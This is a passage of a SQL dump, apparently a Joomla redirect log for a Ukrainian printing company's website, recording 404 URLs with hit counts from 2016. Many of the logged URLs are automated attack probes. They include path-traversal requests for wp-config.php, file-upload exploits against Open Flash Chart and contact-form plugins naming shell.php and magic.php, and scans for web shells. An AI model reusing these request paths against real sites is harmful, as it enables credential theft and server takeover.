00:00:00',301),(1288,'http://ekvatorprint.com.ua/prcsgo.tminting-on-canvas','','','',1,0,'2016-05-15 16:39:29','0000-00-00 00:00:00',301),(1289,'http://ekvatorprint.com.ua/katalog-modulnykh-kartin','','','',6,0,'2016-05-16 07:43:56','0000-00-00 00:00:00',301),(1290,'http://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin','','http://ekvatorprint.com.ua/modulnye-kartiny','',2,0,'2016-05-16 11:56:10','0000-00-00 00:00:00',301),(1291,'http://ekvatorprint.com.ua/components/com_xmap/php-ofc-library/ofc_upload_image.php','','http://ekvatorprint.com.ua/components/com_xmap/php-ofc-library/ofc_upload_image.php','',2,0,'2016-05-16 15:47:48','0000-00-00 00:00:00',301),(1292,'http://ekvatorprint.com.ua/component/contact/contact/undefined','','','',1,0,'2016-05-16 15:59:18','0000-00-00 00:00:00',301),(1293,'http://ekvatorprint.com.ua/?view=article&id=7&Itemid=8','','','',4,0,'2016-05-16 19:14:13','0000-00-00 00:00:00',301),(1294,'http://ekvatorprint.com.ua/impressum.html','','','',1,0,'2016-05-16 21:08:54','0000-00-00 00:00:00',301),(1295,'http://ekvatorprint.com.ua/impressum/','','','',2,0,'2016-05-16 21:08:55','0000-00-00 00:00:00',301),(1296,'http://ekvatorprint.com.ua/imprint.html','','','',2,0,'2016-05-16 21:08:55','0000-00-00 00:00:00',301),(1297,'http://ekvatorprint.com.ua/impressum.htm','','','',1,0,'2016-05-16 21:08:56','0000-00-00 00:00:00',301),(1298,'http://ekvatorprint.com.ua/imprint.php','','','',1,0,'2016-05-16 21:08:56','0000-00-00 00:00:00',301),(1299,'http://ekvatorprint.com.ua/imprint/','','','',1,0,'2016-05-16 21:08:57','0000-00-00 00:00:00',301),(1300,'http://ekvatorprint.com.ua/imprint.htm','','','',1,0,'2016-05-16 21:08:58','0000-00-00 00:00:00',301),(1301,'http://ekvatorprint.com.ua/impressum.php','','','',1,0,'2016-05-16 21:08:58','0000-00-00 00:00:00',301),(1302,'http://ekvatorprint.com.ua/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','','http://ekvatorprint.com.ua/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',4,0,'2016-05-17 05:23:36','0000-00-00 00:00:00',301),(1303,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm.xml','','http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm.xml','',1,0,'2016-05-17 06:11:15','0000-00-00 00:00:00',301),(1304,'http://ekvatorprint.com.ua/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','','http://ekvatorprint.com.ua/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',2,0,'2016-05-17 14:58:20','0000-00-00 00:00:00',301),(1305,'http://ekvatorprint.com.ua/cachee.php','','http://www.googlebot.com/bot.html','',2,0,'2016-05-18 00:16:38','0000-00-00 00:00:00',301),(1306,'http://ekvatorprint.com.ua/index.php?option=com_agora','','http://ekvatorprint.com.ua/','',14,0,'2016-05-19 04:08:53','0000-00-00 00:00:00',301),(1307,'http://ekvatorprint.com.ua/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php','','http://ekvatorprint.com.ua/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php','',5,0,'2016-05-19 06:39:22','0000-00-00 00:00:00',301),(1308,'http://ekvatorprint.com.ua/index.php?Itemid=17&id=16&option=com_content&view=article','','','',8,0,'2016-05-19 13:09:02','0000-00-00 00:00:00',301),(1309,'http://ekvatorprint.com.ua/images/phocagallery/Bannera/thumbs/phoca_thumb_l_Banner-8.jpg','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1059.KkE6jKR1SIeH70ozrFA0XIDZJbq-egUZGQf9BxiUSFZ3kbV3mggRjmMTnBTom1vW.17be1af21dd697ccf1f05c5dc76ea92d24b3d1f2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxaTdkQXQyNnpWd3I1bWR4aXVLckJCeTNjZTNxMWVkTlc0YkRlU2RWa1IwSGhrdGNXUGdmTEJtMFFHMHhGelNHT2xJOHBsTDEtSXR1UDJMU1F5ZjRhU2dKeFctZ2t0NWk1dzdhejhDaWowQjR6VFIwSGZVV3Y5Y1pocDdiSHUzc3lnLXlDa19USklZQnpVU2piMlU2RksxZzhlblBaVW1nOHFlaFhKYWU2Ui1UZ1ZUZGtveUhOQ2s&b64e=2&sign=656a67ec089f120d5f61ed3e1d5fffc4&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiIa6oGHWpvDR_zkMfBRryroY-T3xZtkeeBVrgadlRH20yxasfsbtLpZY87EqcaW_F2Kte5Xruz24ZOJdN_bf6USpqr2ERU1BXgdsweR-7XVJffzWBw2g23RkPYixR5nce&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX5No9jVno6g-t9ON2Kg5kaNc4LvIzmzryWI2vFUVxJNfh1dnOI6mYLACEytOkLLFBAIxuy00bv_1vsQk2-lum0&l10n=ru&cts=1463677961144&mc=3.09269893608','',1,0,'2016-05-19 18:07:00','0000-00-00 00:00:00',301),(1310,'http://ekvatorprint.com.ua/administrator.php','','','',3,0,'2016-05-20 01:45:19','0000-00-00 00:00:00',301),(1311,'http://ekvatorprint.com.ua/administrator/login.php','','','',3,0,'2016-05-20 01:45:20','0000-00-00 00:00:00',301),(1312,'http://ekvatorprint.com.ua/images/aaa.php','','','',1,0,'2016-05-20 12:06:59','0000-00-00 00:00:00',301),(1313,'http://ekvatorprint.com.ua/wp_cache_87649.php','','','',1,0,'2016-05-20 12:06:59','0000-00-00 00:00:00',301),(1314,'http://ekvatorprint.com.ua/wp-sitemaps.php','','','',3,0,'2016-05-20 12:07:00','0000-00-00 00:00:00',301),(1315,'http://ekvatorprint.com.ua/wp-license.php','','','',1,0,'2016-05-20 12:07:00','0000-00-00 00:00:00',301),(1316,'http://ekvatorprint.com.ua/wp-checking.php','','','',12,0,'2016-05-20 12:07:00','0000-00-00 00:00:00',301),(1317,'http://ekvatorprint.com.ua/lic.php','','','',3,0,'2016-05-20 12:07:01','0000-00-00 00:00:00',301),(1318,'http://ekvatorprint.com.ua/wp-terms.php','','','',1,0,'2016-05-20 12:07:01','0000-00-00 00:00:00',301),(1319,'http://ekvatorprint.com.ua/menu.php?action=publish','','','',1,0,'2016-05-20 12:07:01','0000-00-00 00:00:00',301),(1320,'http://ekvatorprint.com.ua/index.php/login-form','','','',25,0,'2016-05-20 23:04:55','0000-00-00 00:00:00',301),(1321,'http://ekvatorprint.com.ua/index.php/login','','','',62,0,'2016-05-20 23:04:55','0000-00-00 00:00:00',301),(1322,'http://ekvatorprint.com.ua/index.php/register','','','',25,0,'2016-05-20 23:04:56','0000-00-00 00:00:00',301),(1323,'http://ekvatorprint.com.ua/log-out.html','','','',25,0,'2016-05-20 23:04:56','0000-00-00 00:00:00',301),(1324,'http://ekvatorprint.com.ua/login','','','',52,0,'2016-05-20 23:04:56','0000-00-00 00:00:00',301),(1325,'http://ekvatorprint.com.ua/index.php/login-form?view=registration','','','',1,0,'2016-05-20 23:04:58','0000-00-00 00:00:00',301),(1326,'http://ekvatorprint.com.ua/index.php/login?view=registration','','','',4,0,'2016-05-20 23:04:58','0000-00-00 00:00:00',301),(1327,'http://ekvatorprint.com.ua/index.php/register?view=registration','','','',1,0,'2016-05-20 23:04:59','0000-00-00 00:00:00',301),(1328,'http://ekvatorprint.com.ua/log-out.html?view=registration','','','',1,0,'2016-05-20 23:04:59','0000-00-00 00:00:00',301),(1329,'http://ekvatorprint.com.ua/login?view=registration','','','',3,0,'2016-05-20 23:04:59','0000-00-00 00:00:00',301),(1330,'http://ekvatorprint.com.ua/register.html','','','',13,0,'2016-05-20 23:04:59','0000-00-00 00:00:00',301),(1331,'http://ekvatorprint.com.ua/index.php/log-out?view=registration','','','',13,0,'2016-05-20 23:04:59','0000-00-00 00:00:00',301),(1332,'http://ekvatorprint.com.ua/loggin.html?view=registration','','','',13,0,'2016-05-20 23:04:59','0000-00-00 00:00:00',301),(1333,'http://ekvatorprint.com.ua/registration-form','','','',26,0,'2016-05-20 23:05:00','0000-00-00 00:00:00',301),(1334,'http://ekvatorprint.com.ua/register-for-access','','','',13,0,'2016-05-20 23:05:00','0000-00-00 00:00:00',301),(1335,'http://ekvatorprint.com.ua/user-profile?view=registration','','','',25,0,'2016-05-20 23:05:00','0000-00-00 00:00:00',301),(1336,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/udd.php','','http://ekvatorprint.com.ua//modules/mod_simplefileuploadv1.3/elements/udd.php','',52,0,'2016-05-21 03:08:43','0000-00-00 00:00:00',301),(1337,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/Simplefileupload.php','','http://www.googlebot.com/bot.html','',1,0,'2016-05-21 03:08:43','0000-00-00 00:00:00',301),(1338,'http://ekvatorprint.com.ua/m/print-citylights','','','',3,0,'2016-05-22 16:24:51','0000-00-00 00:00:00',301),(1339,'http://ekvatorprint.com.ua/mobile/print-citylights','','','',3,0,'2016-05-22 19:51:30','0000-00-00 00:00:00',301),(1340,'http://ekvatorprint.com.ua/wp-content/uploads/wp-cache.php','','http://www.googlebot.com/bot.html','',6,0,'2016-05-23 22:45:15','0000-00-00 00:00:00',301),(1341,'http://ekvatorprint.com.ua/wp-cache.php','','http://www.googlebot.com/bot.html','',22,0,'2016-05-23 22:45:20','0000-00-00 00:00:00',301),(1342,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/wp-cache.php','','http://www.googlebot.com/bot.html','',7,0,'2016-05-23 22:45:26','0000-00-00 00:00:00',301),(1343,'http://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/content/upload.php','','http://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/content/upload.php','',6,0,'2016-05-24 05:25:55','0000-00-00 00:00:00',301),(1344,'http://ekvatorprint.com.ua/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php','','http://ekvatorprint.com.ua/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php','',1,0,'2016-05-25 05:50:28','0000-00-00 00:00:00',301),(1345,'http://ekvatorprint.com.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','http://ekvatorprint.com.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',6,0,'2016-05-25 11:51:33','0000-00-00 00:00:00',301),(1346,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/css/tipsy.css','','','',2,0,'2016-05-25 13:54:13','0000-00-00 00:00:00',301),(1347,'http://ekvatorprint.com.ua/?tmpl=component&catid=0&id=24','','','',7,0,'2016-05-25 19:37:37','0000-00-00 00:00:00',301),(1348,'http://ekvatorprint.com.ua/administrator/components/com_garyscookbook/garyscookbook.xml','','http://ekvatorprint.com.ua/administrator/components/com_garyscookbook/garyscookbook.xml','',2,0,'2016-05-26 06:23:22','0000-00-00 00:00:00',301),(1349,'http://ekvatorprint.com.ua/administrator/components/com_collector/manifest.xml','','http://ekvatorprint.com.ua/administrator/components/com_collector/manifest.xml','',1,0,'2016-05-28 13:17:46','0000-00-00 00:00:00',301),(1350,'http://ekvatorprint.com.ua//images/stories/crimeirc.gif','','','',6,0,'2016-05-28 22:41:35','0000-00-00 00:00:00',301),(1351,'http://ekvatorprint.com.ua/tmp.php','','','',19,0,'2016-05-29 23:14:56','0000-00-00 00:00:00',301),(1352,'http://ekvatorprint.com.ua/joomla-extends.php','','','',5,0,'2016-05-29 23:15:33','0000-00-00 00:00:00',301),(1353,'http://ekvatorprint.com.ua/mobile/modulnye-kartiny','','','',4,0,'2016-05-30 01:42:19','0000-00-00 00:00:00',301),(1354,'http://ekvatorprint.com.ua/index.php?option=com_garyscookbook&func=newItem','','http://ekvatorprint.com.ua/index.php?option=com_garyscookbook&func=newItem','',2,0,'2016-05-30 11:01:09','0000-00-00 00:00:00',301),(1355,'http://ekvatorprint.com.ua/?Itemid=17&id=16&option=com_content&view=article','','','',3,0,'2016-05-30 17:26:09','0000-00-00 00:00:00',301),(1356,'http://ekvatorprint.com.ua/wp-includes/images/xit.gif','','','',5,0,'2016-06-01 01:39:45','0000-00-00 00:00:00',301),(1357,'http://ekvatorprint.com.ua/?option=com_content&view=frontpage&format=feed&type=rss','','','',1,0,'2016-06-02 12:19:20','0000-00-00 00:00:00',301),(1358,'http://ekvatorprint.com.ua/images/phocagallery/Kartini/thumbs/phoca_thumb_l_Kartini-3.jpg','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1073.z5gvJ60CxECEmd6r_4mwHAbrvzSvRkmn1wzo7daLXv-q7KTuDGDb2DGO2Fq6WZle.9d6f1af31ebcad1dce0d0caa6ff0d13653782cfa&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxaTdkQXQyNnpWd3I1bWR4aXVLckJCeTNjZTNxMWVkTlc0YkRlU2RWa1IwSGhrdGNXUGdmTEJtTjNyVzM1a1dIYVZ0YlBndzBoYU9CNXpoSmVMdWNwbF9ZWFFxU3NlSEF2NGVuZHRYZVVhb2h5VlN6RFhQN0U5X3BrN1ppZnRDUDQ0WkpMLVVyVEhqR2NGYXFfR1NSYlVrTFpEd3RNdkVUT1R1Ny00eWFhOE5RWldzXzFJcDJPUzg&b64e=2&sign=2c3390b016ea06822cc493b791e5f1da&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlIjx3O3jiGv1tUiNY-iKQIaQ4B4sp1SPcoxKZzMoUbCYylNaCGsGbJwcA2IgxIxrp-1JjEVCGLDmYWTXyxJKs9ZKoJDsBJl5lgDdHchBYYa8F-fFzvTsWVdSa57DP6Z2p&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXEfKO1imoOE3_TYGU-4P_T1tLh8q-ihKeZAjjyEDKXPq-rjeLm8D3Nfa5YhX874_A2dQl8EPt3UX0dts-nG6XW&l10n=ru&cts=1464881105263&mc=2.33549973252','',2,0,'2016-06-02 15:39:08','0000-00-00 00:00:00',301),(1359,'http://ekvatorprint.com.ua/images/phocagallery/Fotooboi/thumbs/phoca_thumb_l_Fotooboi-4.jpg','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1073.zOFgwQViE2CQa1qiTcrYZDCtvKYPIVXZV073TPMcWf2xTXRWTbqFTClIiE-zPPPy.f92e2442aae879c555837039ffe16a634a69844d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxaTdkQXQyNnpWd3I1bWR4aXVLckJCeTNjZTNxMWVkTlc0YkRlU2RWa1IwSGhrdGNXUGdmTEJtOHh6cnNoSVBSRXB4bTBCcEFIOWRIUGN6Zm5XTDFDR3BDRUFWbVBVZ3NEdmJucTJpY2ZmTjhHUXo1aFdvdXpzbGNLU3JIbWd4RTJHNGhOVVZXdy1NemFtR3JqQlBwRkw3SEF1cDdEQTJEbHJWUW1TMmttbDdUWHRFcVNFeGlwRnM&b64e=2&sign=6fd1e085f3ba31daffee4b1c46e634ff&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTvYn_DoOx4TnIX3gSvBpdUSMv-xeo3OuvE4Iu74qAoseWBhuQreNEGNCGfOrVEAagfMWDQel_g7aemvTOL45dum8VW0gzbGI1-sqZ9-zXq7D03lF43jkwSu_To-h7IUqX&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCURGPWsXpFn9kz9PBw4hm78aLkMz5G_KWcwciieUVeXwq45UCZJu8_2s119ceXlENauDwM_Gh9BQwMfIOhUHT8t&l10n=ru&cts=1464881105263&mc=1.9706208923','',2,0,'2016-06-02 15:39:09','0000-00-00 00:00:00',301),(1360,'http://ekvatorprint.com.ua/yandex_346f4a4ff174dc22.txt','','','',1,0,'2016-06-02 23:55:58','0000-00-00 00:00:00',301),(1361,'http://ekvatorprint.com.ua/yandex_5f52a2f9e6bd58d8.txt','','','',1,0,'2016-06-02 23:55:59','0000-00-00 00:00:00',301),(1362,'http://ekvatorprint.com.ua/yandex_5467304ee98b0f1a.txt','','','',1,0,'2016-06-02 23:56:01','0000-00-00 00:00:00',301),(1363,'http://ekvatorprint.com.ua/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php','','','',31,0,'2016-06-04 02:20:27','0000-00-00 00:00:00',301),(1364,'http://ekvatorprint.com.ua/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php','','','',32,0,'2016-06-04 02:20:47','0000-00-00 00:00:00',301),(1365,'http://ekvatorprint.com.ua/wp-content/themes/FR0_theme/down.php?path=../../../wp-config.php','','','',31,0,'2016-06-04 02:21:31','0000-00-00 00:00:00',301),(1366,'http://ekvatorprint.com.ua/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php','','','',31,0,'2016-06-04 02:21:38','0000-00-00 00:00:00',301),(1367,'http://ekvatorprint.com.ua/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php','','','',32,0,'2016-06-04 02:21:49','0000-00-00 00:00:00',301),(1368,'http://ekvatorprint.com.ua/wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php','','','',32,0,'2016-06-04 02:21:55','0000-00-00 00:00:00',301),(1369,'http://ekvatorprint.com.ua/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php','','','',32,0,'2016-06-04 02:22:01','0000-00-00 00:00:00',301),(1370,'http://ekvatorprint.com.ua/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php','','','',32,0,'2016-06-04 02:22:07','0000-00-00 00:00:00',301),(1371,'http://ekvatorprint.com.ua/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php','','','',31,0,'2016-06-04 02:22:33','0000-00-00 00:00:00',301),(1372,'http://ekvatorprint.com.ua/wp-content/themes/felis/download.php?file=../../../wp-config.php','','','',32,0,'2016-06-04 02:22:45','0000-00-00 00:00:00',301),(1373,'http://ekvatorprint.com.ua/wp-content/themes/jarida/download.php?uri=../../../wp-config.php','','','',31,0,'2016-06-04 02:22:51','0000-00-00 00:00:00',301),(1374,'http://ekvatorprint.com.ua/wp-content/themes/markant/download.php?file=../../../wp-config.php','','','',31,0,'2016-06-04 02:23:10','0000-00-00 00:00:00',301),(1375,'http://ekvatorprint.com.ua/wp-content/themes/tess/download.php?file=../../../wp-config.php','','','',31,0,'2016-06-04 02:23:27','0000-00-00 00:00:00',301),(1376,'http://ekvatorprint.com.ua/wp-content/themes/yakimabait/download.php?file=../../../wp-config.php','','','',31,0,'2016-06-04 02:23:45','0000-00-00 00:00:00',301),(1377,'http://ekvatorprint.com.ua/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php','','','',32,0,'2016-06-04 02:23:51','0000-00-00 00:00:00',301),(1378,'http://ekvatorprint.com.ua/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php','','http://ekvatorprint.com.ua/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php','',6,0,'2016-06-06 04:53:11','0000-00-00 00:00:00',301),(1379,'http://ekvatorprint.com.ua/img/sprite.svg','','http://ekvatorprint.com.ua/print-flags','',1,0,'2016-06-06 14:23:05','0000-00-00 00:00:00',301),(1380,'http://ekvatorprint.com.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','http://ekvatorprint.com.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','',9,0,'2016-06-06 14:35:16','0000-00-00 00:00:00',301),(1381,'http://ekvatorprint.com.ua/media/SS.PhP.txt','','','',5,0,'2016-06-08 19:04:06','0000-00-00 00:00:00',301),(1382,'http://ekvatorprint.com.ua/media/spy.txt','','','',8,0,'2016-06-08 19:04:07','0000-00-00 00:00:00',301),(1383,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&itemid=13','','','',1,0,'2016-06-10 22:25:45','0000-00-00 00:00:00',301),(1384,'http://ekvatorprint.com.ua/go.php?http://ya.ru=','','','',3,0,'2016-06-11 11:21:05','0000-00-00 00:00:00',301),(1385,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:48:51','0000-00-00 00:00:00',301),(1386,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:48:52','0000-00-00 00:00:00',301),(1387,'http://ekvatorprint.com.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:48:52','0000-00-00 00:00:00',301),(1388,'http://ekvatorprint.com.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:48:53','0000-00-00 00:00:00',301),(1389,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:48:54','0000-00-00 00:00:00',301),(1390,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:48:55','0000-00-00 00:00:00',301),(1391,'http://ekvatorprint.com.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:48:55','0000-00-00 00:00:00',301),(1392,'http://ekvatorprint.com.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:48:56','0000-00-00 00:00:00',301),(1393,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:48:57','0000-00-00 00:00:00',301),(1394,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:48:58','0000-00-00 00:00:00',301),(1395,'http://ekvatorprint.com.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:48:58','0000-00-00 00:00:00',301),(1396,'http://ekvatorprint.com.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:48:59','0000-00-00 00:00:00',301),(1397,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:00','0000-00-00 00:00:00',301),(1398,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:00','0000-00-00 00:00:00',301),(1399,'http://ekvatorprint.com.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:01','0000-00-00 00:00:00',301),(1400,'http://ekvatorprint.com.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:02','0000-00-00 00:00:00',301),(1401,'http://ekvatorprint.com.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:03','0000-00-00 00:00:00',301),(1402,'http://ekvatorprint.com.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:04','0000-00-00 00:00:00',301),(1403,'http://ekvatorprint.com.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:49:05','0000-00-00 00:00:00',301),(1404,'http://ekvatorprint.com.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:49:05','0000-00-00 00:00:00',301),(1405,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:49:06','0000-00-00 00:00:00',301),(1406,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:49:07','0000-00-00 00:00:00',301),(1407,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2016-06-11 17:49:07','0000-00-00 00:00:00',301),(1408,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2016-06-11 17:49:08','0000-00-00 00:00:00',301),(1409,'http://ekvatorprint.com.ua/component/content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:09','0000-00-00 00:00:00',301),(1410,'http://ekvatorprint.com.ua/component/content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:09','0000-00-00 00:00:00',301),(1411,'http://ekvatorprint.com.ua/component/content/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:10','0000-00-00 00:00:00',301),(1412,'http://ekvatorprint.com.ua/component/content/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:11','0000-00-00 00:00:00',301),(1413,'http://ekvatorprint.com.ua/component/content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:12','0000-00-00 00:00:00',301),(1414,'http://ekvatorprint.com.ua/component/content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:12','0000-00-00 00:00:00',301),(1415,'http://ekvatorprint.com.ua/component/content/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:13','0000-00-00 00:00:00',301),(1416,'http://ekvatorprint.com.ua/component/content/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:14','0000-00-00 00:00:00',301),(1417,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:14','0000-00-00 00:00:00',301),(1418,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:15','0000-00-00 00:00:00',301),(1419,'http://ekvatorprint.com.ua/component/content/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:16','0000-00-00 00:00:00',301),(1420,'http://ekvatorprint.com.ua/component/content/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:16','0000-00-00 00:00:00',301),(1421,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:17','0000-00-00 00:00:00',301),(1422,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:18','0000-00-00 00:00:00',301),(1423,'http://ekvatorprint.com.ua/component/content/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:19','0000-00-00 00:00:00',301),(1424,'http://ekvatorprint.com.ua/component/content/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2016-06-11 17:49:20','0000-00-00 00:00:00',301),(1425,'http://ekvatorprint.com.ua/component/content/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-06-11 17:49:21','0000-00-00 00:00:00',301),(1426,'http://ekvatorprint.com.ua/component/content/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-06-11 17:49:21','0000-00-00 00:00:00',301),(1427,'http://ekvatorprint.com.ua/component/content/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2016-06-11 17:49:22','0000-00-00 